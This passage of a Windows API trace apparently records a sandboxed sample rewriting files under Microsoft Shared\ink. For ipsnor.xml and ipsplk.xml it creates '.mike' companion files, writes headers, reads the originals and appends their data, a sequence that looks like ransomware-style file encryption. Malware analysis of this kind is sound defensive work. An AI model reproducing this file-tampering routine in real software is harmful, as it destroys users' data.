Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.933] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.933] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.933] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.934] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.934] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.934] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.934] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.934] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.934] GetFileType (hFile=0x264) returned 0x1 [0043.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.934] GetFileType (hFile=0x264) returned 0x1 [0043.934] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.935] WriteFile (in: hFile=0x264, lpBuffer=0x21ed9dc*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21ed9dc*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.935] CloseHandle (hObject=0x264) returned 1 [0043.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.936] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ed520 | out: lpFileInformation=0x21ed520*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa14)) returned 1 [0043.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.936] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.936] GetFileType (hFile=0x264) returned 0x1 [0043.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.936] GetFileType (hFile=0x264) returned 0x1 [0043.936] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.936] ReadFile (in: hFile=0x264, lpBuffer=0x21eeaf0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21eeaf0*, lpNumberOfBytesRead=0x2af0c8*=0xa14, lpOverlapped=0x0) returned 1 [0043.938] CloseHandle (hObject=0x264) returned 1 [0043.938] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.938] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.938] GetFileType (hFile=0x264) returned 0x1 [0043.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.938] GetFileType (hFile=0x264) returned 0x1 [0043.938] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.939] WriteFile (in: hFile=0x264, lpBuffer=0x21f5628*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21f5628*, lpNumberOfBytesWritten=0x2af0bc*=0xa20, lpOverlapped=0x0) returned 1 [0043.939] CloseHandle (hObject=0x264) returned 1 [0043.940] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.940] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.940] GetFileType (hFile=0x264) returned 0x1 [0043.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.940] GetFileType (hFile=0x264) returned 0x1 [0043.941] WriteFile (in: hFile=0x264, lpBuffer=0x21f883c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21f883c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.941] CloseHandle (hObject=0x264) returned 1 [0043.942] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.942] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.942] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe464c000, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe464c000, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe464c000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc40)) returned 1 [0043.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.942] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.942] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.942] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21f9eec | out: lpFileInformation=0x21f9eec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe464c000, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe464c000, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe464c000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc40)) returned 1 [0043.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.942] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", dwFileAttributes=0x80) returned 0 [0043.944] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.944] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.944] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe464c000, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe464c000, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe464c000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc40)) returned 1 [0043.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.944] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpFilePart=0x0) returned 0x3d [0043.944] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.944] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.mike")) returned 1 [0043.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.945] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.947] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.947] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.948] GetFileType (hFile=0x264) returned 0x1 [0043.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.948] GetFileType (hFile=0x264) returned 0x1 [0043.948] CloseHandle (hObject=0x264) returned 1 [0043.948] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.948] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.948] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.948] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.949] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), fInfoLevelId=0x0, lpFileInformation=0x21fbe4c | out: lpFileInformation=0x21fbe4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa28)) returned 1 [0043.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.949] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), fInfoLevelId=0x0, lpFileInformation=0x21fc13c | out: lpFileInformation=0x21fc13c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa28)) returned 1 [0043.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", lpFilePart=0x0) returned 0x42 [0043.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.949] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.950] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.950] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", lpFilePart=0x0) returned 0x42 [0043.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.950] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.950] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", lpFilePart=0x0) returned 0x42 [0043.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.950] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.950] GetFileType (hFile=0x264) returned 0x1 [0043.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.950] GetFileType (hFile=0x264) returned 0x1 [0043.950] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.951] WriteFile (in: hFile=0x264, lpBuffer=0x21fce90*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21fce90*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.951] CloseHandle (hObject=0x264) returned 1 [0043.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.952] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), fInfoLevelId=0x0, lpFileInformation=0x21fc9d4 | out: lpFileInformation=0x21fc9d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa28)) returned 1 [0043.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.952] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.952] GetFileType (hFile=0x264) returned 0x1 [0043.952] SetThreadErrorMode (dwNewMode=0x0, 